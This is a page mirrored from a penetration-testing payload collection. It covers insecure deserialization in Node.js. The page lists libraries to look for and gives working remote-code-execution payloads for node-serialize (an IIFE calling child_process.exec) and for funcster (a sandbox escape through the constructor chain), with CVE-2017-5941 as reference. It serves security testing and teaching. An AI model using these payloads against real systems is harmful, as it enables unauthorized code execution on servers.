node.md (2625B)
1 --- 2 title: "Node Deserialization" 3 topic: "Insecure Deserialization" 4 topicSlug: "insecure-deserialization" 5 sourcePath: "Insecure Deserialization/Node.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Deserialization/Node.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # Node Deserialization 12 13 > Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication. 14 15 ## Summary 16 17 * [Methodology](#methodology) 18 * [node-serialize](#node-serialize) 19 * [funcster](#funcster) 20 * [References](#references) 21 22 ## Methodology 23 24 * In Node source code, look for: 25 26 * `node-serialize` 27 * `serialize-to-js` 28 * `funcster` 29 30 ### node-serialize 31 32 > An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). 33 34 1. Generate a serialized payload 35 36 ```js 37 var y = { 38 rce : function(){ 39 require('child_process').exec('ls /', function(error, 40 stdout, stderr) { console.log(stdout) }); 41 }, 42 } 43 var serialize = require('node-serialize'); 44 console.log("Serialized: \n" + serialize.serialize(y)); 45 ``` 46 47 2. Add bracket `()` to force the execution 48 49 ```js 50 {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"} 51 ``` 52 53 3. Send the payload 54 55 ### funcster 56 57 ```js 58 {"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}} 59 ``` 60 61 ## References 62 63 * [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://web.archive.org/web/20190820172715/https://nvd.nist.gov/vuln/detail/CVE-2017-5941) 64 * [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://web.archive.org/web/20181031111654/https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf) 65 * [NodeJS Deserialization - gonczor - January 8, 2020](https://web.archive.org/web/20240530025137/https://blacksheephacks.pl/nodejs-deserialization/)